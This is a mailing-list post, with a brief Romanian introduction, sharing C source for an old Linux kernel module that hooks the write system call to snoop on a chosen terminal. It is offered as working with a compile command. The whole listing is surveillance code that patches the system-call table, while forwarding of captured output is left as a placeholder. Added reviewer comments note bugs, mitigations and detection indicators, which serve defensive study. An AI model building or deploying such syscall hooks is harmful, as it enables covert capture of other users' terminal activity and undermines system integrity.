ooops! prima versiune este eronata. :) m-am grabit sa il scriu...scuze! aceasta functioneaza! se compileaza cu gcc -c -fomit-frame-pointer -O2 my_ttysnoop.c -o ttysnoop
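/*
 * my_ttysnoop.c -- list attachment posted by halfdead (included as plaintext
 * by Listar).
 * written by [EMAIL PROTECTED]
 * http://www.digitalnerds.net
 *
 * What the module does, as far as this listing shows: at load time it saves
 * the sys_call_table[SYS_write] entry and replaces it with hacked_write();
 * at unload it puts the saved entry back.  hacked_write() copies the data of
 * every write to one selected tty into a kernel buffer, frees the buffer
 * again (forwarding is left as a placeholder), then lets the original
 * handler perform the write.
 *
 * Reviewer notes:
 *  - Every write(2) of every process on the host passes through this code,
 *    so a fault here is a fault in the kernel, not in one program.
 *  - The headers (<linux/malloc.h>, <linux/config.h>) and the exported
 *    sys_call_table[] point to an old kernel generation.  Current kernels
 *    do not export that table to modules and keep it read-only; restricting
 *    module loading (signed modules only, or disabled after boot) removes
 *    the entry point this technique depends on.
 *  - For detection, a system-call table entry whose address lies outside
 *    the core kernel text, alongside an unexpected loaded module, is the
 *    usual indicator of a hook of this kind.
 */
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/fs.h>
#include <linux/dirent.h>
#include <linux/proc_fs.h>
#include <linux/types.h>
#include <linux/stat.h>
#include <linux/fcntl.h>
#include <linux/mm.h>
#include <linux/if.h>
#include <sys/syscall.h>
#include <asm/types.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include <asm/segment.h>
#include <linux/types.h>
#include <linux/malloc.h>
#include <asm/unistd.h>
#include <asm/string.h>

/*
 * Written by the _syscall3() stub below.
 * NOTE(review): one file-scope errno is shared by every task that enters
 * hacked_write(), so concurrent callers can read each other's error code.
 */
int errno;

/* The TTY we want to snoop on (character device major/minor numbers). */
int tty_minor = 2;
int tty_major = 4;

extern void* sys_call_table[];

/* We need the write system call: this generates a local write() stub. */
static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);

/* Saved original sys_call_table[SYS_write] entry; set in init_module(). */
void *orig_write;

/*
 * Test whether fd refers to the TTY we are interested in.
 *
 * Returns 1 when fd is an open descriptor of the current task whose inode
 * has device numbers tty_major/tty_minor, and 0 otherwise.
 */
int is_fd_tty(int fd)
{
	struct file *f = NULL;
	struct inode *inode = NULL;

	/*
	 * fd arrives unchanged from user space.  The original checked only the
	 * upper bound, so write(-1, ...) from any process indexed in front of
	 * the descriptor array.  Reject negative values as well.
	 */
	if (fd < 0 || fd >= NR_OPEN)
		return 0;

	f = current->files->fd[fd];
	if (!f)
		return 0;

	inode = f->f_inode;
	if (!inode)
		return 0;

	if (major(inode->i_rdev) != tty_major)
		return 0;
	if (minor(inode->i_rdev) != tty_minor)
		return 0;
	return 1;
}

/*
 * This function replaces the original sys_write.
 *
 * fd, buf and count are the caller's write(2) arguments; buf is a user-space
 * pointer.  Returns what the original handler returned, or -errno when the
 * stub reported -1.
 */
extern int hacked_write(int fd, char *buf, size_t count)
{
	int r;
	char *kernel_buf;

	/*
	 * count is caller-controlled: count + 1 wraps to 0 for the largest
	 * size_t, which would leave a zero-sized allocation in front of a
	 * count-byte copy.  Skip the copy in that case.
	 */
	if (is_fd_tty(fd) && count + 1 != 0) {
		kernel_buf = (char*) kmalloc(count + 1, GFP_KERNEL);
		/*
		 * kmalloc() fails for large requests; the original copied into
		 * the unchecked pointer, so one oversized write to the tty was
		 * enough to fault inside the kernel.
		 */
		if (kernel_buf) {
			/* Non-zero means some bytes could not be copied. */
			if (copy_from_user(kernel_buf, buf, count) == 0) {
				/*
				 * Placeholder left by the author: the copied
				 * output would be forwarded from here (own
				 * device, another tty or a file).  Nothing is
				 * implemented in this listing.
				 */
			}
			kfree(kernel_buf);
		}
	}

	/*
	 * NOTE(review): the shared table is rewritten on every call with no
	 * locking.  Other tasks, and cleanup_module(), can observe or change
	 * the entry between these two stores, so the table may be left
	 * pointing at hacked_write after the module is gone.  Behaviour is
	 * kept as posted; this is flagged, not fixed.
	 */
	sys_call_table[SYS_write] = orig_write;
	r = write(fd, buf, count);
	sys_call_table[SYS_write] = hacked_write;

	if (r == -1)
		return -errno;
	else
		return r;
}

/* Module load: remember the current write handler and install the hook. */
int init_module(void)
{
	orig_write = sys_call_table[SYS_write];
	sys_call_table[SYS_write] = hacked_write;
	return 0;
}

/* Module unload: stop snooping by restoring the saved handler. */
void cleanup_module(void)
{
	sys_call_table[SYS_write] = orig_write;
}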
